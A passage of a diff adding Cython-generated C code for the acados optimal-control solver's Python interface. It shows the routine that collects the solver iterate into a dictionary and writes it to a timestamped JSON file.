__Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + } + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_strftime); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_7))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_7); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_7, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_kp_u_Y_m_d_H_M_S_f}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + } + __pyx_t_7 = PyNumber_Add(__pyx_t_3, __pyx_kp_u_json_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_filename, __pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF_SET(__pyx_v_filename, __pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":306 + * if not overwrite: + * # append timestamp + * if os.path.isfile(filename): # <<<<<<<<<<<<<< + * filename = filename[:-5] + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":304 + * filename += self.model_name + '_' + 'iterate' + '.json' + * + * if not overwrite: # <<<<<<<<<<<<<< + * # append timestamp + * if os.path.isfile(filename): + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":311 + * + * # get iterate: + * solution = dict() # <<<<<<<<<<<<<< + * + * for i in range(self.N+1): + */ + __pyx_t_3 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_v_solution = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":313 + * solution = dict() + * + * for i in range(self.N+1): # <<<<<<<<<<<<<< + * solution['x_'+str(i)] = self.get(i,'x') + * solution['u_'+str(i)] = self.get(i,'u') + */ + __pyx_t_3 = __Pyx_PyInt_From_long((__pyx_v_self->N + 1)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_7 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (likely(PyList_CheckExact(__pyx_t_7)) || PyTuple_CheckExact(__pyx_t_7)) { + __pyx_t_3 = __pyx_t_7; __Pyx_INCREF(__pyx_t_3); __pyx_t_8 = 0; + __pyx_t_9 = NULL; + } else { + __pyx_t_8 = -1; __pyx_t_3 = PyObject_GetIter(__pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_9 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 313, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + for (;;) { + if (likely(!__pyx_t_9)) { + if (likely(PyList_CheckExact(__pyx_t_3))) { + if (__pyx_t_8 >= PyList_GET_SIZE(__pyx_t_3)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyList_GET_ITEM(__pyx_t_3, __pyx_t_8); __Pyx_INCREF(__pyx_t_7); __pyx_t_8++; if (unlikely((0 < 0))) __PYX_ERR(0, 313, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_3, __pyx_t_8); __pyx_t_8++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } else { + if (__pyx_t_8 >= PyTuple_GET_SIZE(__pyx_t_3)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyTuple_GET_ITEM(__pyx_t_3, __pyx_t_8); __Pyx_INCREF(__pyx_t_7); __pyx_t_8++; if (unlikely((0 < 0))) __PYX_ERR(0, 313, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_3, __pyx_t_8); __pyx_t_8++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } + } else { + __pyx_t_7 = __pyx_t_9(__pyx_t_3); + if (unlikely(!__pyx_t_7)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 313, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_7); + } + __Pyx_XDECREF_SET(__pyx_v_i, __pyx_t_7); + __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":314 + * + * for i in range(self.N+1): + * solution['x_'+str(i)] = self.get(i,'x') # <<<<<<<<<<<<<< + * solution['u_'+str(i)] = self.get(i,'u') + * solution['z_'+str(i)] = self.get(i,'z') + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_i, __pyx_n_u_x}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_n_u_x_2, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_5, __pyx_t_7) < 0))) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":315 + * for i in range(self.N+1): + * solution['x_'+str(i)] = self.get(i,'x') + * solution['u_'+str(i)] = self.get(i,'u') # <<<<<<<<<<<<<< + * solution['z_'+str(i)] = self.get(i,'z') + * solution['lam_'+str(i)] = self.get(i,'lam') + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_i, __pyx_n_u_u}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_5 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = PyNumber_Add(__pyx_n_u_u_2, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_1, __pyx_t_7) < 0))) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":316 + * solution['x_'+str(i)] = self.get(i,'x') + * solution['u_'+str(i)] = self.get(i,'u') + * solution['z_'+str(i)] = self.get(i,'z') # <<<<<<<<<<<<<< + * solution['lam_'+str(i)] = self.get(i,'lam') + * solution['t_'+str(i)] = self.get(i, 't') + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_i, __pyx_n_u_z}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_n_u_z_2, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_5, __pyx_t_7) < 0))) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":317 + * solution['u_'+str(i)] = self.get(i,'u') + * solution['z_'+str(i)] = self.get(i,'z') + * solution['lam_'+str(i)] = self.get(i,'lam') # <<<<<<<<<<<<<< + * solution['t_'+str(i)] = self.get(i, 't') + * solution['sl_'+str(i)] = self.get(i, 'sl') + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_i, __pyx_n_u_lam}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_5 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = PyNumber_Add(__pyx_n_u_lam_2, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_1, __pyx_t_7) < 0))) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":318 + * solution['z_'+str(i)] = self.get(i,'z') + * solution['lam_'+str(i)] = self.get(i,'lam') + * solution['t_'+str(i)] = self.get(i, 't') # <<<<<<<<<<<<<< + * solution['sl_'+str(i)] = self.get(i, 'sl') + * solution['su_'+str(i)] = self.get(i, 'su') + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_i, __pyx_n_u_t}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_n_u_t_2, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_5, __pyx_t_7) < 0))) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":319 + * solution['lam_'+str(i)] = self.get(i,'lam') + * solution['t_'+str(i)] = self.get(i, 't') + * solution['sl_'+str(i)] = self.get(i, 'sl') # <<<<<<<<<<<<<< + * solution['su_'+str(i)] = self.get(i, 'su') + * for i in range(self.N): + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_i, __pyx_n_u_sl}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_5 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = PyNumber_Add(__pyx_n_u_sl_2, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_1, __pyx_t_7) < 0))) __PYX_ERR(0, 319, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":320 + * solution['t_'+str(i)] = self.get(i, 't') + * solution['sl_'+str(i)] = self.get(i, 'sl') + * solution['su_'+str(i)] = self.get(i, 'su') # <<<<<<<<<<<<<< + * for i in range(self.N): + * solution['pi_'+str(i)] = self.get(i,'pi') + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_i, __pyx_n_u_su}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_n_u_su_2, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_5, __pyx_t_7) < 0))) __PYX_ERR(0, 320, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":313 + * solution = dict() + * + * for i in range(self.N+1): # <<<<<<<<<<<<<< + * solution['x_'+str(i)] = self.get(i,'x') + * solution['u_'+str(i)] = self.get(i,'u') + */ + } + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":321 + * solution['sl_'+str(i)] = self.get(i, 'sl') + * solution['su_'+str(i)] = self.get(i, 'su') + * for i in range(self.N): # <<<<<<<<<<<<<< + * solution['pi_'+str(i)] = self.get(i,'pi') + * + */ + __pyx_t_3 = __Pyx_PyInt_From_int(__pyx_v_self->N); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_7 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (likely(PyList_CheckExact(__pyx_t_7)) || PyTuple_CheckExact(__pyx_t_7)) { + __pyx_t_3 = __pyx_t_7; __Pyx_INCREF(__pyx_t_3); __pyx_t_8 = 0; + __pyx_t_9 = NULL; + } else { + __pyx_t_8 = -1; __pyx_t_3 = PyObject_GetIter(__pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_9 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 321, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + for (;;) { + if (likely(!__pyx_t_9)) { + if (likely(PyList_CheckExact(__pyx_t_3))) { + if (__pyx_t_8 >= PyList_GET_SIZE(__pyx_t_3)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyList_GET_ITEM(__pyx_t_3, __pyx_t_8); __Pyx_INCREF(__pyx_t_7); __pyx_t_8++; if (unlikely((0 < 0))) __PYX_ERR(0, 321, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_3, __pyx_t_8); __pyx_t_8++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } else { + if (__pyx_t_8 >= PyTuple_GET_SIZE(__pyx_t_3)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyTuple_GET_ITEM(__pyx_t_3, __pyx_t_8); __Pyx_INCREF(__pyx_t_7); __pyx_t_8++; if (unlikely((0 < 0))) __PYX_ERR(0, 321, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_3, __pyx_t_8); __pyx_t_8++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 321, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } + } else { + __pyx_t_7 = __pyx_t_9(__pyx_t_3); + if (unlikely(!__pyx_t_7)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 321, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_7); + } + __Pyx_XDECREF_SET(__pyx_v_i, __pyx_t_7); + __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":322 + * solution['su_'+str(i)] = self.get(i, 'su') + * for i in range(self.N): + * solution['pi_'+str(i)] = self.get(i,'pi') # <<<<<<<<<<<<<< + * + * # save + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_i, __pyx_n_u_pi}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_5 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = PyNumber_Add(__pyx_n_u_pi_2, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_1, __pyx_t_7) < 0))) __PYX_ERR(0, 322, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":321 + * solution['sl_'+str(i)] = self.get(i, 'sl') + * solution['su_'+str(i)] = self.get(i, 'su') + * for i in range(self.N): # <<<<<<<<<<<<<< + * solution['pi_'+str(i)] = self.get(i,'pi') + * + */ + } + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":325 + * + * # save + * with open(filename, 'w') as f: # <<<<<<<<<<<<<< + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + */ + /*with:*/ { + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_filename); + __Pyx_GIVEREF(__pyx_v_filename); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_filename); + __Pyx_INCREF(__pyx_n_u_w); + __Pyx_GIVEREF(__pyx_n_u_w); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_n_u_w); + __pyx_t_7 = __Pyx_PyObject_Call(__pyx_builtin_open, __pyx_t_3, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_10 = __Pyx_PyObject_LookupSpecial(__pyx_t_7, 